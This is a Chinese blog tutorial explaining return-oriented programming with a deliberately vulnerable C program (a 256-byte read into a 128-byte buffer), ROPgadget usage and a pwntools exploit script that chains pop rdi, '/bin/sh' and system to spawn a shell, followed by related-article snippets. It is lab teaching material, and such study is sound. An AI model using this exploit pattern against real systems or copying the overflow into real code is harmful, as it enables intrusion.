ROP例子

最新推荐文章于 2023-07-10 22:51:04 发布
最新推荐文章于 2023-07-10 22:51:04 发布
阅读量438 收藏 1
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/113736098
版权

下面来举一个简单的ROP攻击技术的例子

#include<stdio.h>
#include<unistd.h>
#include<dlfcn.h>
void vuln_func(){
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

int main(int argc, char *argv[]){
    void *handle = dlopen("libc.so.6", RTLD_NOW | RTLD_GLOBAL);
    printf("%p\n", dlsym(handle, "system"));
    vuln_func();
    write(STDOUT_FILENO, "Hello world!\n", 13);
}

gcc -fno-stack-protector -z noexecstack -pie -fpie ROP64.c -ldl -o ROP64
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.31.so --only "pop|ret" | grep rdi

在这里插入图片描述在这里插入图片描述在这里插入图片描述
rsp, rbp相差128字节
在这里插入图片描述在这里插入图片描述

exp脚本

from pwn import *
io = process('./ROP64')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')

system_addr = int(io.recvline(), 16)
libc_addr = system_addr - libc.sym['system']
binsh_addr = libc_addr + next(libc.search('/bin/sh'))
pop_rdi_addr = libc_addr + 0x0000000000026796

payload = "A" * 136 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)

io.send(payload)
io.interactive()

解释

通常先泄漏运行程序的system地址, 拿到偏移量libc_addr, 根据本地libc搜索/bin/sh的地址, 加上偏移量, 得到binsh_addr即目标程序的/bin/sh地址, 偏移量+本地pop_rdi的地址就是目标程序pop_rdi_addr地址, 栈溢出劫持执行流到pop_rdi_addr, 执行pop rdi, ret.
ret执行相当于pop rip, 此时rsp所在位置是覆盖了binsh_addr和system_addr, 所以相当于rdi参数传递’/bin/sh’, 返回到system函数位置执行, 所以就是执行system(’/bin/sh’), 拿到shell~
(一开始我也不理解, 后来把栈结构画出来, 脑内模拟执行流, 就全部弄清楚了. cheers!!!~

在这里插入图片描述

拿到shell

fa1c4
关注
专栏目录
ROP实例分析(三)--------------------------实例分析
iDevil7的博客
07-13 1427
实例分析源程序如下IDA分析分析过程首先关注mian函数可以看到程序流程设置定时器打印输出Welcometo RCTF\n清空_bss_start数据流读取用户输入到buff(1024字节)中去调用echo函数,参数为buff然后看子函数echo,该子程序流程如下将用户输入的buff逐字节地拷贝到s2(16字节)中,如果遇到\x00截断于是我们找到了漏洞所在处我们要做的工作就是覆盖返回地址并且构造...
一、pwn - 零基础ROP之Android ARM 32位篇(新修订,精华篇)
最新发布
键盘的起始页
04-17 1041
一旦你知道了溢出的偏移量,你就可以构造一个包含NOP滑梯、shellcode以及用于覆盖PC的正确地址的有效载荷。你需要确保shellcode位于溢出点之后,并且PC被设置为指向NOP滑梯的开始部分,这样当执行流到达该位置时就会滑入你的shellcode并执行。使用模式创建工具来确定哪部分输入覆盖了程序计数器(PC),是一种常见的方法,特别是在开发缓冲区溢出漏洞利用时。当程序崩溃时,检查程序计数器(PC)的值。工具将输出一个数字,表示在模式中的偏移量,这个数字就是从输入数据的开始到覆盖PC的点的字节数。
rop攻击实例
dszfzzm的博客
12-13 991
rop32和rop64的个人解题思路,以及一点思考。
(pwn)基本ROP的几个例子(三)
谭宇
12-02 246
五、ret2libc 1)ret2libc1 checksec ret2libc1 IDA伪代码 gdb调试 计算返回地址偏移量得出112 找/bin/sh地址 找到system函数地址 payload 运行 2)ret2libc2 checksec ret2libc2 与上题基本一致,只在找/bin/sh时找不到,需要自己...
(pwn)基本ROP的几个例子(二)
谭宇
11-15 228
四、ret2syscall 点击下载文件rop 检查保护 开启了NX保护 IDA查看代码 ...
rop入门(一)
陈安志的博客
01-12 1680
简介:  rop不同于一般的技术性框架,主要用于构建服务放开平台,您可以使用 Rop 开发类似于淘宝服务开放平台这样的服务平台  Rop 功能 架构  CXF 和 Jersey 是纯技术纯的 Web Service 框架,而在 Rop 中,Web Service 只是核心,  它提供了开发服务平台的诸多领域问题的解决方案:如应用认证、会话管理、安全控制、  错误模型、版本管理、超时限制等
高级ROP
m0_49959202的博客
10-01 1324
文章目录高级ROP1.原理1.1 ret2_dl_runtime_resolve1.1.1 _dl_runtime_resolve()函数机制介绍1.1.2 利用思路1.1.2.1 思路 1:直接控制重定位表项的相关内容1.1.2.2 思路 2 - 间接控制重定位表项的相关内容1.1.2.3 思路 3 - 伪造 link_map1.2 SROP1.2.1 signal机制1.2.2 攻击原理1.2.3 相关工具介绍1.3 ret2VDSO1.3.1 概述1.3.2 vdso.so内函数和gadget1.3.
ROP的基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 2337
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
栈溢出基础——ROP1.0的例题
07-13
本篇将深入探讨栈溢出的基础知识,并通过一个名为“ROP1.0”的例子来进一步理解这一概念。 栈溢出发生的原因通常是由于程序员在处理缓冲区时没有正确地限制输入数据的长度,导致数据超出预分配的内存空间,覆盖了栈...
基本ROP技巧总结
极目楚天舒的博客
05-06 5726
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8323
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
栈溢出学习(三)之简单ROP
Pz_mstr's Blog
03-27 1060
前言 栈溢出学习(三),针对一个例子,进行各种栈溢出技术的练习。 系列文章 栈溢出学习(一) 栈溢出学习(二) 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * ...
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
Windows平台的rop exp编写
weixin_30414635的博客
08-10 324
摘抄自看雪 Windows的ROP与Linux的ROP并不相同,其实Linux下的应该叫做是ret2libc等等。Windows的ROP有明确的执行目标,比如开辟可执行内存然后拷贝shellcode,比如释放可执行执行文件然后执行等等,总之要依赖于一些关键的Windows API来进行。 进行ROP的目的:绕过DEP保护 ROP gadgets:是以 ret 指令结尾的连续的指令 查找ga...
【pwn】基础ROP攻击实战:ret2libc3
ethan18的博客
07-10 377
这里用来记录一下关于PWN中ROP攻击的各种过程和经验ROP攻击是针对那些使用了NX防护的程序,开启NX防护的程序使得栈以及堆上的代码没有办法被执行,导致不能单独将函数栈中的返回地址修改到函数帧中。ROP主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。讲起来还是很抽象,我的理解就是利用了函数帧中的返回地址,以及具有gadgets(也就是带着ret指令的一段汇编语句)都算是ROP攻击。这里我挑一个最经典的ROP作为实战。
BROP攻击实例
u010796610的专栏
02-28 1411
转载于:http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/ Following the 1st session, which talked about the principle of BROP attack, this page will discuss about ho
二十、ROP实践
wanhex的博客
03-10 777
在路由器漏洞利用的场景中,一般使用两种常用的利用方法,一种是上次分享中使用的System/Exec方式,一种就是本节中我们要分享的ROP Chain方式。 ROP(Returen-Oriented Programming)是把原来已经存在的代码块拼接起来,拼接时使用一个预先准备好的、包含各条指令结束后下一条指令地址的特殊返回栈。一般的程序里都包含着大量的返回指令,如“jr $ra”,他们大都位于函...
ROP
weixin_33853794的博客
07-03 641
You get the idea right! We are going to enumerate all the ROP-Gadgets and then chain them together to craft our API call which will in turn disable DEP and allow us to execute our second stage paylo...
ROP(Return Oriented Programming)
iextract的博客
04-26 5146
ROP 在ret2libc中提到了ROP,今天在此详细记录 在YouTube看rop的视频时,视频制作者提及这项技术是Hovav Shacham 于2007年首先展示出来,很是震惊,现在已经是2017年了,10年之内技术又进步到哪里了呢?还望自己勤勉学习,能早一日看见顶峰 rop的起源每一项技术的出现,背后必定有存在的意义,在ret2libc中,我们提及这是为了对抗DEP/NX即W^N技术
RopRop框架:构建服务开放平台的解决方案
"Rop开发手册1.0 - 陈雄华" Rop,全称为Rapid Open Platform,是一个专门用于构建服务开放平台的框架,区别于传统的纯技术型Web Service框架,如CXF和Jersey。Rop设计的目标是为开发者提供一个能够创建类似淘宝服务...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值